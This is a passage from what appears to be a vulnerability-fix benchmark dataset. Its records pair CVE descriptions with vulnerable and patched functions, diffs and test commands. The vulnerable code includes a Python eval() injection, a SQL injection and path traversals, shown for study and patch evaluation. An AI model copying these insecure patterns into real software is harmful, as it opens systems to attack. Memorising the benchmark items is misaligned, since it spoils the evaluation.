}\n // <-------------------------\n\n return res(valid);\n }\n\n // ------------------------> Deprecated\n // Functional Regex\n let functionalRegexMatches = pattern.match(/^(?!=^|,)(!)?\\{\\/(.*)\\/([a-z]*)\\}(\\?)?$/i);\n if (functionalRegexMatches !== null) {\n depricated('tag');\n let match = (String(value).match(new RegExp(functionalRegexMatches[2], functionalRegexMatches[3])) !== null);\n // Negation ? Operator\n if (typeof functionalRegexMatches[4] !== 'undefined') {\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n return res(functionalRegexMatches[1] === '!' ? !match : match);\n }\n\n // Functional Fixed\n let functionalFixedMatches = pattern.match(/^(!)?\\{(.*)\\}(\\?)?$/i);\n if (functionalFixedMatches !== null) {\n depricated('tag');\n let match = (String(value) === String(functionalFixedMatches[2]));\n // Negation ? Operator\n if (typeof functionalFixedMatches[3] !== 'undefined') {\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n return res(functionalFixedMatches[1] === '!' ? !match : match);\n }\n // <-------------------------\n\n // Fixed String Comparition\n return res(value === pattern);\n }\n\n // Constructor is JpvObject\n if (typeof pattern === 'object' && pattern.constructor === JpvObject) {\n if (pattern.type === 'not') {\n return res(!compare(value, pattern.value, options));\n }\n if (pattern.type === 'and') {\n for (let i = 0; i < pattern.value.length; i++) {\n if (!compare(value, pattern.value[i])) {\n return res(false);\n }\n }\n return true;\n }\n if (pattern.type === 'or') {\n for (let i = 0; i < pattern.value.length; i++) {\n if (compare(value, pattern.value[i])) {\n return true;\n }\n }\n return res(false);\n }\n if (pattern.type === 'exact') {\n return res(value === pattern.value);\n }\n\n if (pattern.type === 'typeOf') {\n // eslint-disable-next-line valid-typeof\n return res(typeof value === pattern.value);\n }\n\n if (pattern.type === 'is') {\n return res(comparePattern(value, pattern.value));\n }\n }\n\n // pattern = object\n if (typeof pattern === 'object') {\n if (isArray(pattern)) {\n return res(isArray(value));\n }\n\n if (value !== null) {\n return res(value.constructor === pattern.constructor);\n }\n return res(value === pattern);\n }\n\n // pattern is a function\n if (typeof pattern === 'function') {\n return res(!!pattern(value));\n }\n\n throw new Error('invalid data type');\n};"}, {"id": "fix_js_71_2", "commit": "e3eec1215caa8d5c560f5e88d0943422831927d6", "file_path": "index.js", "start_line": 45, "end_line": 65, "snippet": "/**\n * Custom Is Array\n * @param value\n * @returns boolean\n */\nfunction isArray (value) {\n if (Object.prototype.hasOwnProperty.call(Array, 'isArray')) {\n return Array.isArray(value);\n }\n if (typeof value !== 'object') {\n return false;\n }\n if (Object.prototype.toString.call(value) !== '[object Array]') {\n return false;\n }\n if (!(value instanceof Array)) {\n return false;\n }\n return true;\n}\n"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -5,20 +5,19 @@\n const res = (result) => {\n let val = '';\n if (!pattern || ((typeof pattern !== 'object') && (typeof pattern !== 'string') && typeof pattern !== 'function')) {\n- val = String(pattern)\n+ val = String(pattern);\n } else if (pattern.constructor === JpvObject) {\n val = `operator \"${pattern.type}\": ${JSON.stringify(pattern.value)}`;\n } else {\n- JSON.stringify(pattern)\n+ JSON.stringify(pattern);\n }\n-\n \n if (typeof pattern === 'function') {\n val = pattern.toString();\n }\n if (!result && options && options.debug) {\n options.logger(`error - the value of: {${options.deepLog.join('.')}: ` +\n- `${String(value)}} not matched with: ${val}`);\n+ `${String(value)}} not matched with: ${val}`);\n }\n return result;\n };\n@@ -155,6 +154,10 @@\n \n // pattern = object\n if (typeof pattern === 'object') {\n+ if (isArray(pattern)) {\n+ return res(isArray(value));\n+ }\n+\n if (value !== null) {\n return res(value.constructor === pattern.constructor);\n }\n\n--- /dev/null\n+++ b/index.js\n@@ -0,0 +1,20 @@\n+/**\n+ * Custom Is Array\n+ * @param value\n+ * @returns boolean\n+ */\n+function isArray (value) {\n+ if (Object.prototype.hasOwnProperty.call(Array, 'isArray')) {\n+ return Array.isArray(value);\n+ }\n+ if (typeof value !== 'object') {\n+ return false;\n+ }\n+ if (Object.prototype.toString.call(value) !== '[object Array]') {\n+ return false;\n+ }\n+ if (!(value instanceof Array)) {\n+ return false;\n+ }\n+ return true;\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-17479:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/jpv\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnpx tape test/arrays.js\n", "unit_test_cmd": null} {"cve_id": "CVE-2024-43404", "cve_description": "MEGABOT is a fully customized Discord bot for learning and fun. The `/math` command and functionality of MEGABOT versions < 1.5.0 contains a remote code execution vulnerability due to a Python `eval()`. The vulnerability allows an attacker to inject Python code into the `expression` parameter when using `/math` in any Discord channel. This vulnerability impacts any discord guild utilizing MEGABOT. This vulnerability was fixed in release version 1.5.0.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}}, "repo": "https://github.com/NicPWNs/MEGABOT", "patch_url": ["https://github.com/NicPWNs/MEGABOT/commit/71e79e5581ea36313700385b112d863053fb7ed6"], "programing_language": "Python", "vul_func": [{"id": "vul_py_129_1", "commit": "9d2873c", "file_path": "commands/math.py", "start_line": 5, "end_line": 14, "snippet": "async def math(ctx, expression):\n\n try:\n response = str(eval(expression))\n except:\n response = \"Invalid Expression!\"\n\n embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=response)\n\n await ctx.respond(embed=embed)"}], "fix_func": [{"id": "fix_py_129_1", "commit": "71e79e5", "file_path": "commands/math.py", "start_line": 6, "end_line": 35, "snippet": "async def math(ctx, expression):\n\n try:\n tree = ast.parse(expression, mode=\"eval\")\n except SyntaxError:\n result = \"Not a valid Python expression!\"\n embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=result)\n await ctx.respond(embed=embed)\n\n if not all(\n isinstance(\n node,\n (\n ast.Expression,\n ast.UnaryOp,\n ast.unaryop,\n ast.BinOp,\n ast.operator,\n ast.Constant,\n ),\n )\n for node in ast.walk(tree)\n ):\n result = \"Not a valid mathematical expression!\"\n embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=result)\n await ctx.respond(embed=embed)\n else:\n result = eval(compile(tree, filename=\"\", mode=\"eval\"))\n embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=result)\n await ctx.respond(embed=embed)"}], "vul_patch": "--- a/commands/math.py\n+++ b/commands/math.py\n@@ -1,10 +1,30 @@\n async def math(ctx, expression):\n \n try:\n- response = str(eval(expression))\n- except:\n- response = \"Invalid Expression!\"\n+ tree = ast.parse(expression, mode=\"eval\")\n+ except SyntaxError:\n+ result = \"Not a valid Python expression!\"\n+ embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=result)\n+ await ctx.respond(embed=embed)\n \n- embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=response)\n-\n- await ctx.respond(embed=embed)\n+ if not all(\n+ isinstance(\n+ node,\n+ (\n+ ast.Expression,\n+ ast.UnaryOp,\n+ ast.unaryop,\n+ ast.BinOp,\n+ ast.operator,\n+ ast.Constant,\n+ ),\n+ )\n+ for node in ast.walk(tree)\n+ ):\n+ result = \"Not a valid mathematical expression!\"\n+ embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=result)\n+ await ctx.respond(embed=embed)\n+ else:\n+ result = eval(compile(tree, filename=\"\", mode=\"eval\"))\n+ embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=result)\n+ await ctx.respond(embed=embed)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-36631", "cve_description": "A vulnerability was found in barronwaffles dwc_network_server_emulator. It has been declared as critical. This vulnerability affects the function update_profile of the file gamespy/gs_database.py. The manipulation of the argument firstname/lastname leads to sql injection. The attack can be initiated remotely. The name of the patch is f70eb21394f75019886fbc2fb536de36161ba422. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216772.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/barronwaffles/dwc_network_server_emulator", "patch_url": ["https://github.com/barronwaffles/dwc_network_server_emulator/commit/f70eb21394f75019886fbc2fb536de36161ba422"], "programing_language": "Python", "vul_func": [{"id": "vul_py_144_1", "commit": "78ea738", "file_path": "gamespy/gs_database.py", "start_line": 365, "end_line": 375, "snippet": " def update_profile(self, profileid, field):\n \"\"\"Found profile id associated with session key.\n\n Start replacing each field one by one.\n TODO: Optimize this so it's done all in one update.\n FIXME: Possible security issue due to embedding an unsanitized\n string directly into the statement.\n \"\"\"\n with Transaction(self.conn) as tx:\n q = \"UPDATE users SET \\\"%s\\\" = ? WHERE profileid = ?\"\n tx.nonquery(q % field[0], (field[1], profileid))"}], "fix_func": [{"id": "fix_py_144_1", "commit": "f70eb21", "file_path": "gamespy/gs_database.py", "start_line": 365, "end_line": 375, "snippet": " def update_profile(self, profileid, field):\n \"\"\"Found profile id associated with session key.\n\n Start replacing each field one by one.\n TODO: Optimize this so it's done all in one update.\n TODO: Check if other values than firstname/lastname are set using this\n \"\"\"\n if field[0] in [\"firstname\", \"lastname\"]:\n with Transaction(self.conn) as tx:\n q = \"UPDATE users SET \\\"%s\\\" = ? WHERE profileid = ?\"\n tx.nonquery(q % field[0], (field[1], profileid))"}], "vul_patch": "--- a/gamespy/gs_database.py\n+++ b/gamespy/gs_database.py\n@@ -3,9 +3,9 @@\n \n Start replacing each field one by one.\n TODO: Optimize this so it's done all in one update.\n- FIXME: Possible security issue due to embedding an unsanitized\n- string directly into the statement.\n+ TODO: Check if other values than firstname/lastname are set using this\n \"\"\"\n- with Transaction(self.conn) as tx:\n- q = \"UPDATE users SET \\\"%s\\\" = ? WHERE profileid = ?\"\n- tx.nonquery(q % field[0], (field[1], profileid))\n+ if field[0] in [\"firstname\", \"lastname\"]:\n+ with Transaction(self.conn) as tx:\n+ q = \"UPDATE users SET \\\"%s\\\" = ? WHERE profileid = ?\"\n+ tx.nonquery(q % field[0], (field[1], profileid))\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-48374", "cve_description": "zot is ancontainer image/artifact registry based on the Open Container Initiative Distribution Specification. Prior to version 2.1.3 (corresponding to pseudoversion 1.4.4-0.20250522160828-8a99a3ed231f), when using Keycloak as an oidc provider, the clientsecret gets printed into the container stdout logs for an example at container startup. Version 2.1.3 (corresponding to pseudoversion 1.4.4-0.20250522160828-8a99a3ed231f) fixes the issue.", "cwe_info": {"CWE-532": {"name": "Insertion of Sensitive Information into Log File", "description": "The product writes sensitive information to a log file."}}, "repo": "https://github.com/project-zot/zot", "patch_url": ["https://github.com/project-zot/zot/commit/8a99a3ed231fdcd8467e986182b4705342b6a15e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_74_1", "commit": "af4a46b", "file_path": "pkg/api/config/config.go", "start_line": "327", "end_line": "359", "snippet": "func (c *Config) Sanitize() *Config {\n\tsanitizedConfig := &Config{}\n\n\tif err := DeepCopy(c, sanitizedConfig); err != nil {\n\t\tpanic(err)\n\t}\n\n\tif c.HTTP.Auth != nil && c.HTTP.Auth.LDAP != nil && c.HTTP.Auth.LDAP.bindPassword != \"\" {\n\t\tsanitizedConfig.HTTP.Auth.LDAP = &LDAPConfig{}\n\n\t\tif err := DeepCopy(c.HTTP.Auth.LDAP, sanitizedConfig.HTTP.Auth.LDAP); err != nil {\n\t\t\tpanic(err)\n\t\t}\n\n\t\tsanitizedConfig.HTTP.Auth.LDAP.bindPassword = \"******\"\n\t}\n\n\tif c.IsEventRecorderEnabled() {\n\t\tfor i, sink := range c.Extensions.Events.Sinks {\n\t\t\tif sink.Credentials == nil {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif err := DeepCopy(&c.Extensions.Events.Sinks[i], &sanitizedConfig.Extensions.Events.Sinks[i]); err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\n\t\t\tsanitizedConfig.Extensions.Events.Sinks[i].Credentials.Password = \"******\"\n\t\t}\n\t}\n\n\treturn sanitizedConfig\n}"}], "fix_func": [{"id": "fix_go_74_1", "commit": "8a99a3e", "file_path": "pkg/api/config/config.go", "start_line": "327", "end_line": "381", "snippet": "func (c *Config) Sanitize() *Config {\n\tsanitizedConfig := &Config{}\n\n\tif err := DeepCopy(c, sanitizedConfig); err != nil {\n\t\tpanic(err)\n\t}\n\n\t// Sanitize HTTP config\n\tif c.HTTP.Auth != nil {\n\t\t// Sanitize LDAP bind password\n\t\tif c.HTTP.Auth.LDAP != nil && c.HTTP.Auth.LDAP.bindPassword != \"\" {\n\t\t\tsanitizedConfig.HTTP.Auth.LDAP = &LDAPConfig{}\n\n\t\t\tif err := DeepCopy(c.HTTP.Auth.LDAP, sanitizedConfig.HTTP.Auth.LDAP); err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\n\t\t\tsanitizedConfig.HTTP.Auth.LDAP.bindPassword = \"******\"\n\t\t}\n\n\t\t// Sanitize OpenID client secrets\n\t\tif c.HTTP.Auth.OpenID != nil {\n\t\t\tsanitizedConfig.HTTP.Auth.OpenID = &OpenIDConfig{\n\t\t\t\tProviders: make(map[string]OpenIDProviderConfig),\n\t\t\t}\n\n\t\t\tfor provider, config := range c.HTTP.Auth.OpenID.Providers {\n\t\t\t\tsanitizedConfig.HTTP.Auth.OpenID.Providers[provider] = OpenIDProviderConfig{\n\t\t\t\t\tName: config.Name,\n\t\t\t\t\tClientID: config.ClientID,\n\t\t\t\t\tClientSecret: \"******\",\n\t\t\t\t\tKeyPath: config.KeyPath,\n\t\t\t\t\tIssuer: config.Issuer,\n\t\t\t\t\tScopes: config.Scopes,\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif c.IsEventRecorderEnabled() {\n\t\tfor i, sink := range c.Extensions.Events.Sinks {\n\t\t\tif sink.Credentials == nil {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif err := DeepCopy(&c.Extensions.Events.Sinks[i], &sanitizedConfig.Extensions.Events.Sinks[i]); err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\n\t\t\tsanitizedConfig.Extensions.Events.Sinks[i].Credentials.Password = \"******\"\n\t\t}\n\t}\n\n\treturn sanitizedConfig\n}"}], "vul_patch": "--- a/pkg/api/config/config.go\n+++ b/pkg/api/config/config.go\n@@ -5,14 +5,36 @@\n \t\tpanic(err)\n \t}\n \n-\tif c.HTTP.Auth != nil && c.HTTP.Auth.LDAP != nil && c.HTTP.Auth.LDAP.bindPassword != \"\" {\n-\t\tsanitizedConfig.HTTP.Auth.LDAP = &LDAPConfig{}\n+\t// Sanitize HTTP config\n+\tif c.HTTP.Auth != nil {\n+\t\t// Sanitize LDAP bind password\n+\t\tif c.HTTP.Auth.LDAP != nil && c.HTTP.Auth.LDAP.bindPassword != \"\" {\n+\t\t\tsanitizedConfig.HTTP.Auth.LDAP = &LDAPConfig{}\n \n-\t\tif err := DeepCopy(c.HTTP.Auth.LDAP, sanitizedConfig.HTTP.Auth.LDAP); err != nil {\n-\t\t\tpanic(err)\n+\t\t\tif err := DeepCopy(c.HTTP.Auth.LDAP, sanitizedConfig.HTTP.Auth.LDAP); err != nil {\n+\t\t\t\tpanic(err)\n+\t\t\t}\n+\n+\t\t\tsanitizedConfig.HTTP.Auth.LDAP.bindPassword = \"******\"\n \t\t}\n \n-\t\tsanitizedConfig.HTTP.Auth.LDAP.bindPassword = \"******\"\n+\t\t// Sanitize OpenID client secrets\n+\t\tif c.HTTP.Auth.OpenID != nil {\n+\t\t\tsanitizedConfig.HTTP.Auth.OpenID = &OpenIDConfig{\n+\t\t\t\tProviders: make(map[string]OpenIDProviderConfig),\n+\t\t\t}\n+\n+\t\t\tfor provider, config := range c.HTTP.Auth.OpenID.Providers {\n+\t\t\t\tsanitizedConfig.HTTP.Auth.OpenID.Providers[provider] = OpenIDProviderConfig{\n+\t\t\t\t\tName: config.Name,\n+\t\t\t\t\tClientID: config.ClientID,\n+\t\t\t\t\tClientSecret: \"******\",\n+\t\t\t\t\tKeyPath: config.KeyPath,\n+\t\t\t\t\tIssuer: config.Issuer,\n+\t\t\t\t\tScopes: config.Scopes,\n+\t\t\t\t}\n+\t\t\t}\n+\t\t}\n \t}\n \n \tif c.IsEventRecorderEnabled() {\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-48374:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/zot\nrm -rf ./pkg/api/config/config_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestConfig$ zotregistry.dev/zot/pkg/api/config\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-48374:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/zot\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd pkg/api && go test -timeout 30s -v \n"} {"cve_id": "CVE-2020-7649", "cve_description": "This affects the package snyk-broker before 4.73.0. It allows arbitrary file reads for users with access to Snyk's internal network via directory traversal.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/snyk/broker", "patch_url": ["https://github.com/snyk/broker/commit/90e0bac07a800b7c4c6646097c9c89d6b878b429"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_54_1", "commit": "57c8741", "file_path": "lib/filters/index.js", "start_line": 11, "end_line": 163, "snippet": "module.exports = ruleSource => {\n let rules = [];\n const config = require('../config');\n\n // polymorphic support\n if (Array.isArray(ruleSource)) {\n rules = ruleSource;\n } else if (ruleSource) {\n try {\n rules = require(ruleSource);\n } catch (error) {\n logger.warn({ ruleSource, error }, 'Unable to parse rule source, ignoring');\n }\n }\n\n if (!Array.isArray(rules)) {\n throw new Error(`Expected array of filter rules, got '${typeof rules}' instead.`);\n }\n\n logger.info({ rulesCount: rules.length }, 'loading new rules');\n\n // array of entries with\n const tests = rules.map(entry => {\n const keys = [];\n let { method, origin, path, valid, stream } = entry;\n method = (method || 'get').toLowerCase();\n valid = valid || [];\n\n const bodyFilters = valid.filter(v => !!v.path && !v.regex);\n const bodyRegexFilters = valid.filter(v => !!v.path && !!v.regex);\n const queryFilters = valid.filter(v => !!v.queryParam);\n\n // now track if there's any values that we need to interpolate later\n const fromConfig = {};\n\n // slightly bespoke version of replace-vars.js\n path = (path || '').replace(/(\\${.*?})/g, (_, match) => {\n const key = match.slice(2, -1); // ditch the wrappers\n fromConfig[key] = config[key] || '';\n return ':' + key;\n });\n\n origin = replace(origin, config);\n\n if (path[0] !== '/') {\n path = '/' + path;\n }\n\n logger.info({ method, path }, 'adding new filter rule');\n const regexp = pathRegexp(path, keys);\n\n return (req) => {\n // check the request method\n if (req.method.toLowerCase() !== method && method !== 'any') {\n return false;\n }\n\n // Discard any fragments before further processing\n const mainURI = req.url.split('#')[0];\n\n // query params might contain additional \"?\"s, only split on the 1st one\n const parts = mainURI.split('?');\n let [url, querystring] = [parts[0], parts.slice(1).join('?')];\n const res = regexp.exec(url);\n if (!res) {\n // no url match\n return false;\n }\n\n // reconstruct the url from the user config\n for (let i = 1; i < res.length; i++) {\n const val = fromConfig[keys[i - 1].name];\n if (val) {\n url = url.replace(res[i], val);\n }\n }\n\n // if validity filters are present, at least one must be satisfied\n if (bodyFilters.length || bodyRegexFilters.length ||\n queryFilters.length) {\n let isValid;\n\n let parsedBody;\n if (bodyFilters.length) {\n parsedBody = tryJSONParse(req.body);\n\n // validate against the body\n isValid = bodyFilters.some(({ path, value }) => {\n return undefsafe(parsedBody, path, value);\n });\n }\n\n if (!isValid && bodyRegexFilters.length) {\n parsedBody = parsedBody || tryJSONParse(req.body);\n\n // validate against the body by regex\n isValid = bodyRegexFilters.some(({ path, regex }) => {\n try {\n const re = new RegExp(regex);\n return re.test(undefsafe(parsedBody, path));\n } catch (error) {\n logger.error({error, path, regex},\n 'failed to test regex rule');\n return false;\n }\n });\n }\n\n // no need to check query filters if the request is already valid\n if (!isValid && queryFilters.length) {\n const parsedQuerystring = qs.parse(querystring);\n\n // validate against the querystring\n isValid = queryFilters.some(({ queryParam, values }) => {\n return values.some(value =>\n minimatch(parsedQuerystring[queryParam] || '', value)\n );\n });\n }\n\n if (!isValid) {\n return false;\n }\n }\n\n logger.debug({ path, origin, url, querystring }, 'rule matched');\n\n querystring = (querystring) ? `?${querystring}` : '';\n return {\n url: origin + url + querystring,\n auth: entry.auth && authHeader(entry.auth),\n stream\n };\n };\n });\n\n return (payload, callback) => {\n let res = false;\n logger.debug({ rulesCount: tests.length }, 'looking for a rule match');\n\n for (const test of tests) {\n res = test(payload);\n if (res) {\n break;\n }\n }\n if (!res) {\n return callback(Error('blocked'));\n }\n\n return callback(null, res);\n };\n};"}], "fix_func": [{"id": "fix_js_54_1", "commit": "90e0bac07a800b7c4c6646097c9c89d6b878b429", "file_path": "lib/filters/index.js", "start_line": 12, "end_line": 169, "snippet": "module.exports = ruleSource => {\n let rules = [];\n const config = require('../config');\n\n // polymorphic support\n if (Array.isArray(ruleSource)) {\n rules = ruleSource;\n } else if (ruleSource) {\n try {\n rules = require(ruleSource);\n } catch (error) {\n logger.warn({ ruleSource, error }, 'Unable to parse rule source, ignoring');\n }\n }\n\n if (!Array.isArray(rules)) {\n throw new Error(`Expected array of filter rules, got '${typeof rules}' instead.`);\n }\n\n logger.info({ rulesCount: rules.length }, 'loading new rules');\n\n // array of entries with\n const tests = rules.map(entry => {\n const keys = [];\n let { method, origin, path: entryPath, valid, stream } = entry;\n method = (method || 'get').toLowerCase();\n valid = valid || [];\n\n const bodyFilters = valid.filter(v => !!v.path && !v.regex);\n const bodyRegexFilters = valid.filter(v => !!v.path && !!v.regex);\n const queryFilters = valid.filter(v => !!v.queryParam);\n\n // now track if there's any values that we need to interpolate later\n const fromConfig = {};\n\n // slightly bespoke version of replace-vars.js\n entryPath = (entryPath || '').replace(/(\\${.*?})/g, (_, match) => {\n const key = match.slice(2, -1); // ditch the wrappers\n fromConfig[key] = config[key] || '';\n return ':' + key;\n });\n\n origin = replace(origin, config);\n\n if (entryPath[0] !== '/') {\n entryPath = '/' + entryPath;\n }\n\n logger.info({ method, path: entryPath }, 'adding new filter rule');\n const regexp = pathRegexp(entryPath, keys);\n\n return (req) => {\n // check the request method\n if (req.method.toLowerCase() !== method && method !== 'any') {\n return false;\n }\n\n // Do not allow directory traversal\n if (path.normalize(req.url) !== req.url) {\n return false;\n }\n\n // Discard any fragments before further processing\n const mainURI = req.url.split('#')[0];\n\n // query params might contain additional \"?\"s, only split on the 1st one\n const parts = mainURI.split('?');\n let [url, querystring] = [parts[0], parts.slice(1).join('?')];\n const res = regexp.exec(url);\n if (!res) {\n // no url match\n return false;\n }\n\n // reconstruct the url from the user config\n for (let i = 1; i < res.length; i++) {\n const val = fromConfig[keys[i - 1].name];\n if (val) {\n url = url.replace(res[i], val);\n }\n }\n\n // if validity filters are present, at least one must be satisfied\n if (bodyFilters.length || bodyRegexFilters.length ||\n queryFilters.length) {\n let isValid;\n\n let parsedBody;\n if (bodyFilters.length) {\n parsedBody = tryJSONParse(req.body);\n\n // validate against the body\n isValid = bodyFilters.some(({ path, value }) => {\n return undefsafe(parsedBody, path, value);\n });\n }\n\n if (!isValid && bodyRegexFilters.length) {\n parsedBody = parsedBody || tryJSONParse(req.body);\n\n // validate against the body by regex\n isValid = bodyRegexFilters.some(({ path, regex }) => {\n try {\n const re = new RegExp(regex);\n return re.test(undefsafe(parsedBody, path));\n } catch (error) {\n logger.error({error, path, regex},\n 'failed to test regex rule');\n return false;\n }\n });\n }\n\n // no need to check query filters if the request is already valid\n if (!isValid && queryFilters.length) {\n const parsedQuerystring = qs.parse(querystring);\n\n // validate against the querystring\n isValid = queryFilters.some(({ queryParam, values }) => {\n return values.some(value =>\n minimatch(parsedQuerystring[queryParam] || '', value)\n );\n });\n }\n\n if (!isValid) {\n return false;\n }\n }\n\n logger.debug({ path: entryPath, origin, url, querystring }, 'rule matched');\n\n querystring = (querystring) ? `?${querystring}` : '';\n return {\n url: origin + url + querystring,\n auth: entry.auth && authHeader(entry.auth),\n stream\n };\n };\n });\n\n return (payload, callback) => {\n let res = false;\n logger.debug({ rulesCount: tests.length }, 'looking for a rule match');\n\n for (const test of tests) {\n res = test(payload);\n if (res) {\n break;\n }\n }\n if (!res) {\n return callback(Error('blocked'));\n }\n\n return callback(null, res);\n };\n};"}], "vul_patch": "--- a/lib/filters/index.js\n+++ b/lib/filters/index.js\n@@ -22,7 +22,7 @@\n // array of entries with\n const tests = rules.map(entry => {\n const keys = [];\n- let { method, origin, path, valid, stream } = entry;\n+ let { method, origin, path: entryPath, valid, stream } = entry;\n method = (method || 'get').toLowerCase();\n valid = valid || [];\n \n@@ -34,7 +34,7 @@\n const fromConfig = {};\n \n // slightly bespoke version of replace-vars.js\n- path = (path || '').replace(/(\\${.*?})/g, (_, match) => {\n+ entryPath = (entryPath || '').replace(/(\\${.*?})/g, (_, match) => {\n const key = match.slice(2, -1); // ditch the wrappers\n fromConfig[key] = config[key] || '';\n return ':' + key;\n@@ -42,16 +42,21 @@\n \n origin = replace(origin, config);\n \n- if (path[0] !== '/') {\n- path = '/' + path;\n+ if (entryPath[0] !== '/') {\n+ entryPath = '/' + entryPath;\n }\n \n- logger.info({ method, path }, 'adding new filter rule');\n- const regexp = pathRegexp(path, keys);\n+ logger.info({ method, path: entryPath }, 'adding new filter rule');\n+ const regexp = pathRegexp(entryPath, keys);\n \n return (req) => {\n // check the request method\n if (req.method.toLowerCase() !== method && method !== 'any') {\n+ return false;\n+ }\n+\n+ // Do not allow directory traversal\n+ if (path.normalize(req.url) !== req.url) {\n return false;\n }\n \n@@ -123,7 +128,7 @@\n }\n }\n \n- logger.debug({ path, origin, url, querystring }, 'rule matched');\n+ logger.debug({ path: entryPath, origin, url, querystring }, 'rule matched');\n \n querystring = (querystring) ? `?${querystring}` : '';\n return {\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-7649:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/broker\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnode test/unit/filters.test.js\n", "unit_test_cmd": null} {"cve_id": "CVE-2018-25059", "cve_description": "A vulnerability was found in pastebinit up to 0.2.2 and classified as problematic. Affected by this issue is the function pasteHandler of the file server.go. The manipulation of the argument r.URL.Path leads to path traversal. Upgrading to version 0.2.3 is able to address this issue. The name of the patch is 1af2facb6d95976c532b7f8f82747d454a092272. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217040.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/jessfraz/pastebinit", "patch_url": ["https://github.com/jessfraz/pastebinit/commit/1af2facb6d95976c532b7f8f82747d454a092272"], "programing_language": "Go", "vul_func": [{"id": "vul_go_264_1", "commit": "edb60577888e36ba5139bee2b8050d8123654ab7", "file_path": "server.go", "start_line": 151, "end_line": 234, "snippet": "func (cmd *serverCommand) pasteHandler(w http.ResponseWriter, r *http.Request) {\n\tif r.URL.Path == \"/\" {\n\t\t// they want the root, make them auth\n\t\tu, p, ok := r.BasicAuth()\n\t\tif (u != username || p != password) || !ok {\n\t\t\tw.Header().Set(\"WWW-Authenticate\", `Basic realm=\"`+baseuri+`\"`)\n\t\t\tw.WriteHeader(401)\n\t\t\tw.Write([]byte(\"401 Unauthorized\\n\"))\n\t\t\treturn\n\t\t}\n\n\t\thtml, err := cmd.generateIndexHTML()\n\t\tif err != nil {\n\t\t\twriteError(w, fmt.Sprintf(\"generating index html failed: %v\", err))\n\t\t\treturn\n\t\t}\n\n\t\t// write the html\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\tfmt.Fprint(w, html)\n\t\tlogrus.Info(\"index file rendered\")\n\t\treturn\n\t}\n\n\tfilename := filepath.Join(cmd.storage, strings.Trim(r.URL.Path, \"/\"))\n\n\tvar handler func(data []byte) (string, error)\n\n\tif strings.HasSuffix(filename, \"/raw\") {\n\t\t// if they want the raw file serve a text/plain Content-Type\n\t\tw.Header().Set(\"Content-Type\", \"text/plain\")\n\t\t// trim '/raw' from the filename so we can get the right file\n\t\tfilename = strings.TrimSuffix(filename, \"/raw\")\n\t\thandler = func(data []byte) (string, error) {\n\t\t\treturn string(data), nil\n\t\t}\n\t} else if strings.HasSuffix(filename, \"/html\") {\n\t\t// check if they want 